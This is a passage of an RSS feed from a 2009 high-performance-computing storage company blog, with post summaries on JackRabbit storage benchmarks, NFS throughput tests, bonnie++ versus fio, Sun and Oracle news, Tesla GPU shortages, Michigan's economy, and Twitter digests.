      <description>There is a strong push (well at least the articles tell us so, and you know, its not like they are ever wrong &amp;hellip; nosiree) to move computing into a cloud. This is sometimes a good idea, there are specific profiles which fit the cloud paradigm. Quite a few profiles actually. But there are some speedbumps. Literally. Bandwidth has been, and will be, an issue for the foreseeable future. Clouds have limited bandwidth in and out.</description>
    </item>
    
    <item>
      <title>Sometimes being right isn&#39;t a happy thing</title>
      <link>https://blog.scalability.org/2009/07/sometimes-being-right-isnt-a-happy-thing/</link>
      <pubDate>Thu, 16 Jul 2009 00:00:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/sometimes-being-right-isnt-a-happy-thing/</guid>
      <description>In this post, I wrote
and today, we get confirmation that we hit 15.2% in June. More layoffs have happened since then. GM cut another 1000, Chrysler and Ford have been cutting hard. So when can we start using the correct name for this economic condition? What I can say is that I am seeing signs of life &amp;hellip; significant signs of life in the HPC auto community. No, not necessarily the big 3&amp;rsquo;s large machines.</description>
    </item>
    
    <item>
      <title>OT:  bad ideas</title>
      <link>https://blog.scalability.org/2009/07/ot-bad-ideas/</link>
      <pubDate>Wed, 15 Jul 2009 12:15:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/ot-bad-ideas/</guid>
      <description>Saw this, this morning. Then another one. No, this will not impact me/us right now. And as we are converting the LLC into a C-corp, it should have no real impact until we sell the company. But it will impact any small business owner with enough revenue to matter. Heck, if you look on tax returns, it appears that lots of small business owners are wealthy. They aren&amp;rsquo;t but it would appear that way.</description>
    </item>
    
    <item>
      <title>Sun reports Q4 numbers</title>
      <link>https://blog.scalability.org/2009/07/sun-reports-q4-numbers/</link>
      <pubDate>Wed, 15 Jul 2009 01:08:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/sun-reports-q4-numbers/</guid>
      <description>At the Reg. Not good. In a nutshell? Revenues cratered.
Thursday, Sun shareholders vote on selling Sun to Oracle. I&amp;rsquo;d call it a foregone conclusion that this deal will be approved. If the regulators don&amp;rsquo;t approve it &amp;hellip; well &amp;hellip;
The Reg opines more.
Yeah. We have a reasonably good idea of what is and is not toast. It would not surprise me to see Oracle sell off the hardware business in bits and pieces.</description>
    </item>
    
    <item>
      <title>The business side of HPC</title>
      <link>https://blog.scalability.org/2009/07/the-business-side-of-hpc-2/</link>
      <pubDate>Tue, 14 Jul 2009 23:04:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/the-business-side-of-hpc-2/</guid>
      <description>John West at InsideHPC has, as usual, an interesting article on rumors of SGI abandoning a bid because of &amp;ldquo;margin games.&amp;rdquo;
The market is changing as business gets more challenging. The drive to lower and negative margins will drive vendors from the market. At some point those purchasing gear will have to decide if the cost they pay for driving the price and margins into the ground is worth the benefit they get for doing it.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-14</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-14/</link>
      <pubDate>Tue, 14 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-14/</guid>
      <description>* JR5 96TB #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) unit ([http://bit.ly/2UhAFV](http://bit.ly/2UhAFV)  hits 2.5GB/s (http://scalability.org/?p=1706) sustained w/256GB file # * FYI: gigabyte per second #NFS on a single cost-effective box. See http://scalability.org/?p=1708 about this #hpc #storage unit #
Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Who says you can&#39;t do Gigabyte per second NFS?</title>
      <link>https://blog.scalability.org/2009/07/who-says-you-cant-do-gigabyte-per-second-nfs/</link>
      <pubDate>Mon, 13 Jul 2009 16:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/who-says-you-cant-do-gigabyte-per-second-nfs/</guid>
      <description>I keep hearing this. Its not true though. See below. NFS client: Scalable Informatics Delta-V (ΔV) 4 unit NFS server: Scalable Informatics JackRabbit 4 unit. (you can buy these units today from Scalable Informatics and its partners) 10GbE: single XFP fibre between two 10GbE NICs. This is NOT a clustered NFS result.
root@dv4:~# mount | grep data2 10.1.3.1:/data on /data2 type nfs (rw,intr,rsize=262144,wsize=262144,tcp,addr=10.1.3.1) root@dv4:~# mpirun -np 4 ./io-bm.exe -n 32 -f /data2/test/file -r -d -v N=32 gigabytes will be written in total each thread will output 8.</description>
    </item>
    
    <item>
      <title>Its all in how you do the IO ...</title>
      <link>https://blog.scalability.org/2009/07/its-all-in-how-you-do-the-io/</link>
      <pubDate>Mon, 13 Jul 2009 03:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/its-all-in-how-you-do-the-io/</guid>
      <description>JackRabbit 5U (JR5) 96TB unit, with 8 threads writing to the same file (each one writing to a different section of the file to reduce contention). write performance below.
[root@jr5 ~]# mpirun -np 8 ./io-bm.exe -n 128 -f /data/file -w -s -d -v N=128 gigabytes will be written in total each thread will output 16.000 gigabytes page size ... 4096 bytes number of elements per buffer ... 2097152 number of buffers per file .</description>
    </item>
    
    <item>
      <title>Puzzle solved ... now good results</title>
      <link>https://blog.scalability.org/2009/07/puzzle-solved-now-good-results/</link>
      <pubDate>Mon, 13 Jul 2009 02:52:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/puzzle-solved-now-good-results/</guid>
      <description>Ok, io-bm.c is fixed. I had a typo in a define. That did a pretty good job of removing all the MPI goodness &amp;hellip; Fixed, and ran it. Looks like we see good performance, with none of the strange loss of IO that bonnie++ has. This is what we see with verbose mode on.
Writing: 4 threads
[root@jr5 ~]# mpirun -np 4 ./io-bm.exe -n 128 -f /data/file -w -d -v N=128 gigabytes will be written in total each thread will output 32.</description>
    </item>
    
    <item>
      <title>A mystery within a puzzle ...</title>
      <link>https://blog.scalability.org/2009/07/a-mystery-within-a-puzzle/</link>
      <pubDate>Sun, 12 Jul 2009 19:35:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/a-mystery-within-a-puzzle/</guid>
      <description>In some previous posts I had been discussing bonnie++ (not bonnie, sorry Tim) and its seeming inability to keep the underlying file system busy. So I hauled out something I wrote a while ago, for precisely these purposes (I&amp;rsquo;ll get it onto our external Mercurial repository soon). Push the box(es) as hard as you can, in IO. I built this using OpenMPI on the JackRabbit (JR5 96TB unit) and ran it.</description>
    </item>
    
    <item>
      <title>More local economic bits</title>
      <link>https://blog.scalability.org/2009/07/more-local-economic-bits/</link>
      <pubDate>Sun, 12 Jul 2009 16:14:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/more-local-economic-bits/</guid>
      <description>My rep in congress (Scalable&amp;rsquo;s too) is pointing out some unhappy guestimates of how our local economy will fare:
Well, while agree with him that its getting worse here (we blew through 14.1% in May &amp;hellip; likely at 15% or worse now in July), had the autos fallen, the unemployment would have been worse. This said, it is very important to let the economy do what economies do best, and stop trying to pretend to control it.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-12</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-12/</link>
      <pubDate>Sun, 12 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-12/</guid>
      <description>* from the testing lab, some very fast #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) systems: 24TB JR4 writes at 2 GB/s, 96 TB JR5 reads at 2.2 GB/s. [#](http://twitter.com/sijoe/statuses/2592997412)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>JackRabbit 5U 96TB time trials</title>
      <link>https://blog.scalability.org/2009/07/jackrabbit-5u-96tb-time-trials/</link>
      <pubDate>Sun, 12 Jul 2009 02:34:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/jackrabbit-5u-96tb-time-trials/</guid>
      <description>The raid has finished building on the JackRabbit 5U (JR5) (these units are now available from us or our reseller partners in the US, EU, and India). As a refresher, this is the 96TB unit, with 3 RAID cards, and 48x 2TB enterprise SATA disks. The RAIDs are hardware RAID6 (16 drives, 1 hot spare and 15 RAID drives, yielding 13 data drives). 3 groups of 13x 2TB drives is 78TB.</description>
    </item>
    
    <item>
      <title>More bonnie</title>
      <link>https://blog.scalability.org/2009/07/more-bonnie/</link>
      <pubDate>Sat, 11 Jul 2009 17:47:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/more-bonnie/</guid>
      <description>Following Chris Samuel&amp;rsquo;s suggestion, I pulled down version 1.96 of bonnie and built it. The machine I am using now is a Scientific Linux based system, with Scalable Informatics 2.6.28.7 kernel. Scientific Linux is yet another RHEL rebuild. This is a customer requested distribution for this machine. SL suffers from the RHEL kernel, which is IMO inappropriate for use as a high performance storage system kernel. Workload patterns our customers wish to test regularly crash the RHEL distro kernels.</description>
    </item>
    
    <item>
      <title>Bonnie isn&#39;t that good at characterizing system IO rates</title>
      <link>https://blog.scalability.org/2009/07/bonnie-isnt-that-good-at-characterizing-system-io-rates/</link>
      <pubDate>Sat, 11 Jul 2009 05:05:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/bonnie-isnt-that-good-at-characterizing-system-io-rates/</guid>
      <description>I started thinking about bonnie&amp;rsquo;s IO after looking at some of the numbers, and how the system behaved while running the tool. Fio is much better and more controllable tool. You can understand what it is doing. And you can use it to model bonnie, and therefore understand what bonnie is and isn&amp;rsquo;t doing.
In short, while running bonnie++, I found the core machine stats, as seen in vmstat, dstat, iostat, and other tools, to be basically idle during the writes.</description>
    </item>
    
    <item>
      <title>DV4 mounting JR4 over NFS and doing a simple stream copy</title>
      <link>https://blog.scalability.org/2009/07/dv4-mounting-jr4-over-nfs-and-doing-a-simple-stream-copy/</link>
      <pubDate>Fri, 10 Jul 2009 21:32:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/dv4-mounting-jr4-over-nfs-and-doing-a-simple-stream-copy/</guid>
      <description>This is what our tagline of Simply Faster means. The performance is there, and is simple to use. See below.
On DV4
root@dv4:~# mount -o intr,rsize=262144,wsize=262144,tcp 10.1.3.1:/data /data2 root@dv4:~# ls -alF /data2 total 67108868 drwxr-xr-x 2 root root 21 2009-07-10 11:01 ./ drwxr-xr-x 23 root root 4096 2009-07-10 17:18 ../ -rw-r--r-- 1 root root 68719476736 2009-07-10 13:07 big.file root@dv4:~# dd if=/data2/big.file of=/dev/null bs=16M 4096+0 records in 4096+0 records out 68719476736 bytes (69 GB) copied, 110.</description>
    </item>
    
    <item>
      <title>Time trials:  A new record</title>
      <link>https://blog.scalability.org/2009/07/time-trials-a-new-record/</link>
      <pubDate>Fri, 10 Jul 2009 19:20:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/time-trials-a-new-record/</guid>
      <description>The JR5 is still building its RAID. 96TB of sweetness in that unit. But its the JR4 that is tearing up the records. Did a little tuning, just to fix a problem with the OS drives. I&amp;rsquo;ll have a long diatribe on this at some point, but not now. JR4, sitting on the bench in the lab. Pair of Chelsio 10GbE cards, 8 cores of Nehalem goodness, 48 GB ram. Lets take her for a spin, and light up the afterburners.</description>
    </item>
    
    <item>
      <title>pre-tuning baseline streaming data run for new JR4s</title>
      <link>https://blog.scalability.org/2009/07/pre-tuning-baseline-streaming-data-run-for-new-jr4s/</link>
      <pubDate>Wed, 08 Jul 2009 13:01:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/pre-tuning-baseline-streaming-data-run-for-new-jr4s/</guid>
      <description>In the late 80s, right before I finished undergraduate work at Stony Brook, I bought an orange colored 1973 Chevy Nova. It was, well, butt ugly. But it had a 350 small block engine in it which, as I had been told by people (supposedly) more knowledgeable than I (in these areas), was shared by the Corvette models of that year. I don&amp;rsquo;t know if that was true. I do know that this was an engine I could tune.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-08</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-08/</link>
      <pubDate>Wed, 08 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-08/</guid>
      <description>* Stabilizing JR4 with SAS drives. Some motherboard - raid issues to be dealt with. Performance is good. [#](http://twitter.com/sijoe/statuses/2517905215) * The 2TB drives have arrived ... the 2TB drives have arrived ... [#](http://twitter.com/sijoe/statuses/2517918749)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>in the testing lab</title>
      <link>https://blog.scalability.org/2009/07/in-the-testing-lab/</link>
      <pubDate>Tue, 07 Jul 2009 20:56:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/in-the-testing-lab/</guid>
      <description>Thought a few people might like to see this. A new JackRabbit (JR4) being built. We are testing one of its RAIDs. Dealing with some MB issues, but otherwise, back onto stable ground. This is a single RAID card with 8 drives, 7 in a RAID6 + 1 hot spare. Large sequential streaming read and write. 4x larger than RAM in the machine. Caching is not relevant to this. No tuning.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-07</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-07/</link>
      <pubDate>Tue, 07 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-07/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) Gb/s or GB/s? An order of magnitude can make a large difference ... [in reply to garystiehr](http://twitter.com/garystiehr/statuses/2499758846) [#](http://twitter.com/sijoe/statuses/2504247739) * new 48TB DV4 is up and rock solid. Working on stabilizing the JR4 that goes with it. Some 10GbE cards are hard to find these days ... [#](http://twitter.com/sijoe/statuses/2504274758)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Two for two ...</title>
      <link>https://blog.scalability.org/2009/07/two-for-two/</link>
      <pubDate>Mon, 06 Jul 2009 15:28:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/two-for-two/</guid>
      <description>We use Fedex and UPS to ship in the day job. Lots of our stuff is pretty sturdy, but some things simply do not like being bumped hard. Like disks. Or like Pegasus boxen, with many expensive cards sitting in the PCI-e slots. Awaiting pictures from the customer, but it looks like two of the Cell based units we shipped out (w/o Tesla cards, that should be arriving soon), got beat up in transit.</description>
    </item>
    
    <item>
      <title>Amusing programming construct that I am using for sanity checking</title>
      <link>https://blog.scalability.org/2009/06/amusing-programming-construct-that-i-am-using-for-sanity-checking/</link>
      <pubDate>Wed, 01 Jul 2009 03:36:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/amusing-programming-construct-that-i-am-using-for-sanity-checking/</guid>
      <description>Start out from a known state &amp;hellip; `
my $dryrun = false; my $debug = false; my $sanity = false;  Heh ... Maybe I should create a function with a probability distribution (a fuzzy function) named &amp;quot;is_in_doubt()&amp;quot; so I can writemy $sanity = &amp;amp;is;_in_doubt();` (and yes, this is Perl &amp;hellip; I just can&amp;rsquo;t bring myself to go back to a language that thinks indentation is a good and necessary thing for program structure &amp;hellip; :( )</description>
    </item>
    
    <item>
      <title>Good conversation with NVidia</title>
      <link>https://blog.scalability.org/2009/06/good-conversation-with-nvidia/</link>
      <pubDate>Mon, 29 Jun 2009 17:55:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/good-conversation-with-nvidia/</guid>
      <description>They are getting backlog serviced as fast as they can. Looks like they are clearing it out pretty quickly. This is good. Customers had been asking us about the reason for the delay. We speculated numerous possibilities. Most (all?) of them (my speculations) were wrong. That is good as well. I am thinking now that the problem is macroeconomic, not microeconomic. That is, its the entire ecosystem, not one company. Everyone gets walloped in a recession.</description>
    </item>
    
    <item>
      <title>Cloud storage and HPC cloud PR is out</title>
      <link>https://blog.scalability.org/2009/06/cloud-storage-and-hpc-cloud-pr-is-out/</link>
      <pubDate>Mon, 29 Jun 2009 13:51:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/cloud-storage-and-hpc-cloud-pr-is-out/</guid>
      <description>Released this morning Automated High Performance Computing Solutions Provide Alternative to Shared Virtual Private Server Clouds FORT LAUDERDALE, Fla.&amp;ndash;(Business Wire)&amp;ndash; NewServers Inc., the leading provider of Hardware as a Service (HaaS) dedicated cloud servers, today announced a strategic partnership with high performance computing (HPC) provider Scalable Informatics that will provide cloud storage solutions capable of supporting HPC.
NewServers will integrate Scalable Informatics&#39; JackRabbit high-performance server storage solution into the company&amp;rsquo;s service.</description>
    </item>
    
    <item>
      <title>Lots of updates, all good</title>
      <link>https://blog.scalability.org/2009/06/lots-of-updates-all-good/</link>
      <pubDate>Sat, 27 Jun 2009 19:12:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/lots-of-updates-all-good/</guid>
      <description>All for the day job: First, our help system is now online. This allows us to provide an externally visible issue tracking and project management/tracking site for customers. Not just for our hardware. Scalable Informatics has been helping people support other peoples hardware for quite a while. Some of our biggest/best customers have not bought a single bit of hardware from us, but pay us to help them support, run, install, manage, &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Freedom from bricking</title>
      <link>https://blog.scalability.org/2009/06/freedom-from-bricking/</link>
      <pubDate>Thu, 25 Jun 2009 13:12:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/freedom-from-bricking/</guid>
      <description>This is one of several memes customers are noting to us. They are worried, what happens if vendor X goes away, can I still get support/fixes/replacement parts for my gear? In the case of some of our competitors, the answer is a resounding and unqualified NO. In our case, our high performance JackRabbit systems, our value priced Delta-V, and our Pegasus deskside supercomputers, the answer is a resounding and unqualified YES.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-25</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-25/</link>
      <pubDate>Thu, 25 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-25/</guid>
      <description>* There seems to be an awful lot of pr0n types that follow ... I block them. Is this a losing battle? Should I just give in? [#](http://twitter.com/sijoe/statuses/2318023529)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>One bit of looking happened upon something else ... which resonates with todays economic climate</title>
      <link>https://blog.scalability.org/2009/06/one-bit-of-looking-happened-upon-something-else-which-resonates-with-todays-economic-climate/</link>
      <pubDate>Thu, 25 Jun 2009 04:28:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/one-bit-of-looking-happened-upon-something-else-which-resonates-with-todays-economic-climate/</guid>
      <description>I was looking up one of my favorite (silly) phrases after a long hard day getting mvsas to work correctly on a Pegasus workstation running Fedora. I won&amp;rsquo;t let this devolve into a Fedora bashing session, though Fedora does need it. That is what triggered this look though. I kept slogging at a number of Fedora misfeatures, until my efforts were rewarded. This resonated, and reminded me of one of my favorite (silly) phrases &amp;hellip; &amp;hellip; The beatings will continue until morale improves.</description>
    </item>
    
    <item>
      <title>Kick a region when its&#39; down ...</title>
      <link>https://blog.scalability.org/2009/06/kick-a-region-when-its-down/</link>
      <pubDate>Tue, 23 Jun 2009 20:17:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/kick-a-region-when-its-down/</guid>
      <description>I&amp;rsquo;ve been talking about the woes of the area we live and work in. Canton is right outside Detroit and Ann Arbor Michigan. Its a nice place for many reasons. But a tech haven? No. For a long time, we had lots of commercial supercomputing in this area. It was a good place to be w.r.t. this. But times, they are a-changing. CIO magazine has an article on &amp;ldquo;The Worst U.</description>
    </item>
    
    <item>
      <title>Does &#34;Best Practices&#34; really mean &#34;this is how we want to do it so nah nah to you&#34;?</title>
      <link>https://blog.scalability.org/2009/06/does-best-practices-really-mean-this-is-how-we-want-to-do-it-so-nah-nah-to-you/</link>
      <pubDate>Tue, 23 Jun 2009 14:39:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/does-best-practices-really-mean-this-is-how-we-want-to-do-it-so-nah-nah-to-you/</guid>
      <description>I&amp;rsquo;ve noticed this, that when people talk about &amp;ldquo;best practices&amp;rdquo; in HPC, usually there is &amp;hellip; well &amp;hellip; a slant to their analysis. Put another way &amp;hellip; can you get real unbiased information on &amp;ldquo;best practices&amp;rdquo; from a biased partisan, who might not have been exposed to alternative methods, and may have a financial interest in a particular set of practices? We see this with consultants seeking to sell their own services as &amp;ldquo;best practices&amp;rdquo;, with hardware and software vendors seeking to incorporate their products into &amp;ldquo;best practices&amp;rdquo; workflows.</description>
    </item>
    
    <item>
      <title>Sounds like Lustre is getting something of a bad rap</title>
      <link>https://blog.scalability.org/2009/06/sounds-like-lustre-is-getting-something-of-a-bad-rap/</link>
      <pubDate>Tue, 23 Jun 2009 14:24:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/sounds-like-lustre-is-getting-something-of-a-bad-rap/</guid>
      <description>Coverage from ISC09 in Hamburg has GPFS (from IBM) doing well, and Lustre being &amp;hellip; well &amp;hellip; Lustre. From InsideHPC&amp;rsquo;s coverage in the sidebar &amp;hellip;
You can follow them on twitter directly, or through the feed on InsideHPC. I recommend the latter, as John and team put up often interesting commentary after this.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-23</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-23/</link>
      <pubDate>Tue, 23 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-23/</guid>
      <description>* booted 96TB JackRabbit, w/o disks/raid, for initial checkout. Unit is fast as an #[hpc](http://search.twitter.com/search?q=%23hpc) platform, looking to bench the #[storage](http://search.twitter.com/search?q=%23storage) [#](http://twitter.com/sijoe/statuses/2285894794)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>An emerging plan to solve the national debt ...</title>
      <link>https://blog.scalability.org/2009/06/an-emerging-plan-to-solve-the-national-debt/</link>
      <pubDate>Sun, 21 Jun 2009 16:01:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/an-emerging-plan-to-solve-the-national-debt/</guid>
      <description>heh &amp;hellip;.
US To Trade Gold Reserves For Cash Through Cash4Gold.com</description>
    </item>
    
    <item>
      <title>shades of things to come for Sun</title>
      <link>https://blog.scalability.org/2009/06/shades-of-things-to-come-for-sun/</link>
      <pubDate>Sat, 20 Jun 2009 20:53:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/shades-of-things-to-come-for-sun/</guid>
      <description>There are still a few stalwarts who believe that Oracle&amp;rsquo;s purchase of Sun will continue their favorite projects and products. Then you see stuff like this:
Whoops.
Now fast forward a few weeks, for when Sun&amp;rsquo;s purchase closes.
So virtualbox is likely dead as a product. A few months ago I speculated that the purchase of Sun was brilliant in part due to all the technologies Oracle would get. Many would be shuttered.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-20</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-20/</link>
      <pubDate>Sat, 20 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-20/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) I looked at Sharethis and a bunch of others. Addtoany was the least annoying of the lot. I tried a number two weeks ago [in reply to garystiehr](http://twitter.com/garystiehr/statuses/2233135919) [#](http://twitter.com/sijoe/statuses/2246497585)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>speaking of accelerating ...</title>
      <link>https://blog.scalability.org/2009/06/speaking-of-accelerating/</link>
      <pubDate>Sat, 20 Jun 2009 01:30:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/speaking-of-accelerating/</guid>
      <description>I have noticed that we are measuring quotes generated per day, versus last year when it was per week, or the years before where it was per month. Not a great metric, but we are definitely feeling pressed back in our seats as we accelerate hard. Its becoming apparent that I need to find additional pairs of hands, eyes, and brains (single or in pairs). Once we are sure all the stars are aligned, we&amp;rsquo;ll say more.</description>
    </item>
    
    <item>
      <title>14.1% and accelerating ...</title>
      <link>https://blog.scalability.org/2009/06/14-1-and-accelerating/</link>
      <pubDate>Fri, 19 Jun 2009 19:17:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/14-1-and-accelerating/</guid>
      <description>c.f. here
I head this morning that it was 14.1% in May. I wonder when we are going to stop using the euphemism &amp;ldquo;the longest recession since the great depression&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Registering for an account: some things I have observed</title>
      <link>https://blog.scalability.org/2009/06/registering-for-an-account-some-things-i-have-observed/</link>
      <pubDate>Fri, 19 Jun 2009 12:58:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/registering-for-an-account-some-things-i-have-observed/</guid>
      <description>So the day jobs online store is up. We provide some of the information openly, and some information, specifically pricing, is available to people who register for an account. Why do we do it this way? I&amp;rsquo;ve found this to be a good way to distinguish between people who are merely curious, but wouldn&amp;rsquo;t consider purchasing, and people who want information for a potential purchase. If you are serious about something, you are going to be willing to dig a little deeper.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-19</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-19/</link>
      <pubDate>Fri, 19 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-19/</guid>
      <description>* Exploring twitter marketing. Please tweet back if you are interested in twitter based sales on #[storage](http://search.twitter.com/search?q=%23storage) and #[hpc](http://search.twitter.com/search?q=%23hpc) systems and support [#](http://twitter.com/sijoe/statuses/2227707831) * Just joined a twibe. Visit [http://twibes.com/HPC?v=0](http://twibes.com/HPC?v=0) to join [#](http://twitter.com/sijoe/statuses/2227988975) * Just started a Twibe. Visit [http://twibes.com/scalable](http://twibes.com/scalable) to join. [#](http://twitter.com/sijoe/statuses/2228008441)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-18</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-18/</link>
      <pubDate>Thu, 18 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-18/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) Tigers ... nooooooo what is it with these Detroit teams... is there something in the water here? [in reply to garystiehr](http://twitter.com/garystiehr/statuses/2202218024) [#](http://twitter.com/sijoe/statuses/2205419461)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Dealing with the Tesla non-availability issue</title>
      <link>https://blog.scalability.org/2009/06/dealing-with-the-tesla-non-availability-issue/</link>
      <pubDate>Thu, 18 Jun 2009 02:14:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/dealing-with-the-tesla-non-availability-issue/</guid>
      <description>If you haven&amp;rsquo;t heard, Tesla&amp;rsquo;s are hard to come by. We have several Pegasus systems that customers have purchased, that we can&amp;rsquo;t get the units for. All of the distributors and resellers we have spoken to indicate that they are getting a small fraction of their orders filled. We have had units on order over a month. Several more orders, and a hard deadline to get units filled.
We have heard rumors of fabrication problems and part recalls (given the past history with other chipsets, some believe this to be the case, though I am not sure &amp;hellip; more likely a low yield coupled with something else).</description>
    </item>
    
    <item>
      <title>A &#34;FOR DEMONSTRATION USE ONLY&#34; bios on the SAS controller ...  huh?</title>
      <link>https://blog.scalability.org/2009/06/a-for-demonstration-use-only-bios-on-the-sas-controller-huh/</link>
      <pubDate>Thu, 18 Jun 2009 01:08:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/a-for-demonstration-use-only-bios-on-the-sas-controller-huh/</guid>
      <description>Well, its not just that it says that it is a beta bios. This is annoying but ok, as you know the other bios will (hopefully) soon follow. Its that it says its &amp;ldquo;FOR DEMONSTRATION PURPOSES ONLY&amp;rdquo;. I snapped a picture of the bios boot screen. Will post it tomorrow if there is interest. Apparently, the motherboards are indeed shipping this way. We were told originally that demand was high, and thats why they were delayed.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-17</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-17/</link>
      <pubDate>Wed, 17 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-17/</guid>
      <description>* For a downward moving economy we are busier than ever, selling #[jackrabbit](http://search.twitter.com/search?q=%23jackrabbit) boxes with many #[terabyte](http://search.twitter.com/search?q=%23terabyte) to proposed #[petabyte](http://search.twitter.com/search?q=%23petabyte) scale #[storage](http://search.twitter.com/search?q=%23storage) [#](http://twitter.com/sijoe/statuses/2198137724) * Just added myself to the [http://wefollow.com](http://wefollow.com) twitter directory under: #[storage](http://search.twitter.com/search?q=%23storage) #[HPC](http://search.twitter.com/search?q=%23HPC) #[startup](http://search.twitter.com/search?q=%23startup) [#](http://twitter.com/sijoe/statuses/2198178717) * I just added myself to [http://twitr.org](http://twitr.org) Twitter Directory under #[storage](http://search.twitter.com/search?q=%23storage) #[hpc](http://search.twitter.com/search?q=%23hpc) #[startup](http://search.twitter.com/search?q=%23startup) [#](http://twitter.com/sijoe/statuses/2198210459)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Benchmarks: mdbnch</title>
      <link>https://blog.scalability.org/2009/06/benchmarks-mdbnch/</link>
      <pubDate>Wed, 17 Jun 2009 05:09:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/benchmarks-mdbnch/</guid>
      <description>Many moons ago, we used MDBNCH as a performance test case for new compilers and platforms. It is a molecular dynamics benchmark test. Large caches help it. So do fast instruction issue rates. And bloody fast FP execution units. For a long time I had wondered when we would see the first crossing of 1 second to complete this benchmark. It was getting closer and closer. So this evening, with gfortran, I built it with -O3.</description>
    </item>
    
    <item>
      <title>There are fads, and then there are FADs</title>
      <link>https://blog.scalability.org/2009/06/there-are-fads-and-then-there-are-fads/</link>
